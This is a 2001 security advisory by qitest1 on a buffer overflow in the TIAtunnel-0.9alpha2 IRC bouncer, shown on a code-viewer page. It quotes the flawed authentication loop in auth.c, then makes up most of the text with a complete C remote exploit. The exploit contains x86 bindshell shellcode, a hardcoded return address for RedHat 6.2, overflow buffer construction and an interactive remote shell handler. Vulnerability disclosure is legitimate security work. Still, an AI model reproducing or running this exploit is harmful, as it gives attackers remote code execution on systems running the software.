📄 tiatunnel.c
字号:
/* qitest1's security advisory #001 */ Buffer Overflow in TIAtunnel-0.9alpha2+Systems Affected Any system running TIAtunnel-0.9alpha2+Program Description TIAtunnel is a simple IRC bouncer that allows access from a simple IPv4 box to any kind of well-known server. It has been written by tHE rECIdjVO <recidjvo@pkcrew.org>, http://tiatunnel.pkcrew.org/.+Vulnerability And Impact A remote attacker can overflow a buffer and execute arbitrary code on the system with the privileges of the user running TIAtunnel. Infact in auth.c at line 28 we have: struct tunnel *auth_conn(int *csock, int entries) { char authline[512]; /* static char buf */ struct tunnel *t_current; int i = 0; // Read one line from the client bzero(authline, 512); while((authline[i - 1] != '\n') && (authline[i - 1] != '\r') && (i < 1024)) { /* 1024?! =) */ read(*csock, (authline + i++), (size_t)1); }+Solution Author was contacted. Upgrade your version of TIAtunnel.+Exploit This bug can be succesfully exploited by a remote attacker. There is a demonstrative exploit code attached to this advisory. See the code for more info.--/* qitest1 http://qitest1.cjb.net * * ``Ut tensio, sic vis. 69 tecum sis.'' * * main(){if(unsatisfied == 69) try_come(in);} */[ attachment: tiatunnel.c (text/plain) ]/* * TIAtunnel-0.9alpha2 Linux x86 remote exploit * by qitest1 - 5/06/2001 * * Shellcode is executed with the privileges of the program. I * noticed that with a simple execve() a shell was executed but its * IO was linked with the term where TIAtunnel was launched. This * is not a problem for us if we use a bindshell code. * * Greets: recidjvo->Tnx for this bug. And now you can really smile. * Nail ->Dear friend ;) * Hmm.. 0x69 seems to strike again.. */#include <stdio.h>#include <string.h>#include <unistd.h>#include <netinet/in.h>#include <netdb.h>#define RETPOS 516struct targ{ int def; char *descr; unsigned long int retaddr;};struct targ target[]= { {0, "RedHat 6.2 with TIAtunnel-0.9alpha2 from tar.gz", 0xbffff67c}, {69, NULL, 0} };char shellcode[] = /* bindshell at port 30464 */ "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0" "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06" "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89" "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31" "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80" "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04" "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd" "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80" "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f" "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31" "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";char mybuf[RETPOS + 4 + 1 + 1];int sockami(char *host, int port);void do_mybuf(unsigned long retaddr);void shellami(int sock);void usage(char *progname);main(int argc, char **argv){int i, sel = 0, port = 0, offset = 0, sock, cnt;char *host = NULL; printf("\n TIAtunnel-0.9alpha2 exploit by qitest1\n\n"); if(argc == 1) usage(argv[0]); while((cnt = getopt(argc,argv,"h:p:t:o:")) != EOF) { switch(cnt) { case 'h': host = strdup(optarg); break; case 'p': port = atoi(optarg); break; case 't': sel = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); break; } } if(host == NULL) usage(argv[0]); if(port == 0) usage(argv[0]); printf("+Host: %s\n as: %s\n", host, target[sel].descr); printf("+Connecting to %s...\n", host); sock = sockami(host, port); printf(" connected\n"); target[0].retaddr += atoi(argv[1]); printf("+Building buffer with retaddr: %p...\n", target[0].retaddr); do_mybuf(target[0].retaddr); strcat(mybuf, "\n"); printf(" done\n"); send(sock, mybuf, strlen(mybuf), 0); printf("+Overflowing...\n"); printf("+Zzing...\n"); sleep(2); printf("+Getting shell...\n"); sock = sockami(host, 30464); shellami(sock);}intsockami(char *host, int port){struct sockaddr_in address;struct hostent *hp;int sock; sock = socket(AF_INET, SOCK_STREAM, 0); if(sock == -1) { perror("socket()"); exit(-1); } hp = gethostbyname(host); if(hp == NULL) { perror("gethostbyname()"); exit(-1); } memset(&address, 0, sizeof(address)); memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length); address.sin_family = AF_INET; address.sin_port = htons(port); if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1) { perror("connect()"); exit(-1); } return(sock);}voiddo_mybuf(unsigned long int retaddr){int i, n = 0;unsigned long *ret; memset(mybuf, 0x90, sizeof(mybuf)); for(i = RETPOS - strlen(shellcode); i < RETPOS; i++) { mybuf[i] = shellcode[n++]; } ret = (unsigned long *) (mybuf + RETPOS); *ret = retaddr; mybuf[RETPOS + 4] = '\x00';}voidshellami(int sock){int n;char recvbuf[1024];char *cmd = "id; uname -a\n";fd_set rset; send(sock, cmd, strlen(cmd), 0); while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(sock,&rset)) { n=read(sock,recvbuf,1024); if (n <= 0) { printf("Connection closed by foreign host.\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(sock,recvbuf,n); } } } return;}voidusage(char *progname){int i = 0; printf("Usage: %s [options]\n", progname); printf("Options:\n" " -h hostname\n" " -p port\n" " -t target\n" " -o offset\n" "Available targets:\n"); while(target[i].def != 69) { printf(" %d) %s\n", target[i].def, target[i].descr); i++; } exit(1);}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -